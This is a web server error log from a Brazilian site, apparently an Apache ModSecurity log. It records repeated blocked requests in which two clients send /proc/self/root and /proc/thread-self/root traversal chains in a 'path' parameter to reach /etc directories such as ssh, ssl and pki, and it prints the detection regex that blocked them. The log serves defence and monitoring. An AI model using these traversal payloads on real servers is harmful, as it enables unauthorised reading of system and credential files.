https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:41:20.566179 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.241.31:46588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WQLninkcc-iUj5ApOmgAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:41:21.850943 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:46592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WQeoXxyEfFpUF8f9x2wAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:41:25.054591 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:46606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WRda6ubjKNq_cu4bCswAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:41:55.912583 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:46618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WYwF0L0L-SsrnPo5X5AAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:42:58.655155 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:53152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WogF0L0L-SsrnPo5YPQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:42:59.144317 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:53152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WowF0L0L-SsrnPo5YPgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:04.768279 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:59022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WqF1pVZ5mVmJwsFMf8wAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:09.889256 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:59028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wrbninkcc-iUj5ApO0AAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:11.213051 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:48500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wr_qxLDW4GITHUkTVgwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:12.397799 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:48512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WsLninkcc-iUj5ApO0gAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:13.808280 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:48526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WsfXLqtnMIWvjpaKKNwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:15.051473 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:48538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ws7ninkcc-iUj5ApO1QAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:16.370300 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:48544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WtPqxLDW4GITHUkTVhwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:17.679206 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:48546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WtfHIg5MgXLBnicPpiAAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:19.009541 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:48558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WtwF0L0L-SsrnPo5YSAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:20.163244 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:49888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WuPXLqtnMIWvjpaKKPAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:22.019546 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:49900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WuTJ3M9BSuKP7CAYIoQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:23.427033 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:49904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wu-oXxyEfFpUF8f9yXwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:24.735396 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:49918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WvPHIg5MgXLBnicPpjAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:27.531008 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:49922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WvV1pVZ5mVmJwsFMgAAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:29.992508 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:49936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wwda6ubjKNq_cu4bC7QAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
